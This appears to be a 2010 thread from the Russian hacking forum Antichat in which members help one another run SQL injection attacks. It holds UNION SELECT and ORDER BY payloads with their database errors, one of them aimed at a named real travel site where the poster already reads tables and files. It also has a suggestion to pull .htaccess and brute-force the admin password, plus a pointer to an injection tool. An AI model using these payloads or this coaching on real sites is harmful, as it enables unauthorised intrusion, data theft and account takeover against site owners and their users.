Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

22.04.2010, 17:18
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
Сообщение от Konqi
я здесь параметров не вижу
даже если будет
http://site.com/news/news567.php
Ты огорчил весь античат.
567 этo GET запрос какого то параметра.
http://site.com/news/news123456+union+select+1,2,3,4.php
// Привет ЧПУ
|
|
|

22.04.2010, 17:23
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от Ctacok
Ты огорчил весь античат.
567 этo GET запрос какого то параметра.
http://site.com/news/news123456+union+select+1,2,3,4.php
// Привет ЧПУ
a с чего взял что это GET ?
может просто имя news567
|
|
|

22.04.2010, 17:23
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме: 540530
Репутация:
54
|
|
Вопрос наверное риторический. Наверное многим попадались сайты, где скажем ссылки типа http://site.com/news/news567.html.... Такое чувство, что включен mod rewrite, а не статические страницы. Можно ли здесь найти sql-инъекцию например?
apache mod_rewrite
В некоторых случаях, СКЛ инъекция возможна даже в параметре, который преобразуется методами mod_rewrite модуля apache, к GET параметру скрипта.
Например, скрипты типа /news/127.html преобразуются к /news/news.php?id=127 следующим правилом: RewriteRule ^/news/(.*)\.html$ "/news/news.php?id=$1"
Это позволит передать злонамеренные значения параметра скрипту. Так, например /news/128-1.html
Если выводятся подробные сообщения об ошибках, то можно сразу узнать адрес скрипа, и далее, подобрав параметр работать уже с ним. Если же нет, то можно исследовать уязвимость, прямо редактируя имя файла.
ссылка на источник http://www.securitylab.ru/contest/212083.php
|
|
|

22.04.2010, 18:12
|
|
Познающий
Регистрация: 04.11.2007
Сообщений: 51
Провел на форуме: 310791
Репутация:
6
|
|
Видел давно прогу ,каторая помогает в sql-inj -подбирает поля,кол-во столбцов, может кто скинуть?
|
|
|

22.04.2010, 18:21
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
SIPT
|
|
|

22.04.2010, 18:25
|
|
Познающий
Регистрация: 10.01.2009
Сообщений: 31
Провел на форуме: 1128838
Репутация:
36
|
|
Через скулю получил таблицу и имена колонок, но когда делаю:
Код:
select username from userstable - выдает ошибку
а при
Код:
select somesolumn from othertable - все нормально
помогите раскрутить. также доступна читалка файлов\каталогов.
Код:
http://www.solvex.ru/countries/israel/news/?id=48+and+1=2+union+select+version(),2,3--
|
|
|

22.04.2010, 18:33
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
unhex(hex()) или же
select username from твоябд.userstable
Всякая проблема может быть 
|
|
|

22.04.2010, 18:45
|
|
Познающий
Регистрация: 10.01.2009
Сообщений: 31
Провел на форуме: 1128838
Репутация:
36
|
|
забыл добавить, это пробовал.
либо плохо пробовал)
не получлось(
|
|
|

22.04.2010, 18:51
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме: 7452489
Репутация:
1359
|
|
Сообщение от -=ASSKAKO=-
Через скулю получил таблицу и имена колонок, но когда делаю:
Код:
select username from userstable - выдает ошибку
а при
Код:
select somesolumn from othertable - все нормально
помогите раскрутить. также доступна читалка файлов\каталогов.
Код:
http://www.solvex.ru/countries/israel/news/?id=48+and+1=2+union+select+version(),2,3--
Админку защищает basic авторизация, может и нет никакой таблицы пользователей.
+ Это mysql на FreeBSD с file_priv.
Можно найти .htaccess и попробовать сбрутить пасс
|
|
|

22.04.2010, 19:29
|
|
Познающий
Регистрация: 04.11.2007
Сообщений: 51
Провел на форуме: 310791
Репутация:
6
|
|
PHP код:
http://www.qwerty.ru/page.php?id=-999'
-> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-999''' at line 1
PHP код:
http://www.qwerty.ru/page.php?id=1 order by 50
-> ошибка - :Unknown column '50' in 'order clause'
PHP код:
http://www.qwerty.ru/page.php?id=1 order by 2
-> ошибка - :Unknown column '2' in 'order clause'
PHP код:
http://www.qwerty.ru/page.php?id=1 order by 1
-> Грузится норм сайт...
Получается всего 1 столбец ? 0o
PHP код:
http://www.qwerty.ru/page.php?id=1'+union+select+0/*
-> ошибка - :The used SELECT statements have a different number of columns
PHP код:
http://www.qwerty.ru/page.php?id=-1+union+select+0 */
--> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/ AND poz=1' at line 1
подскажите плз что можно сделать?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|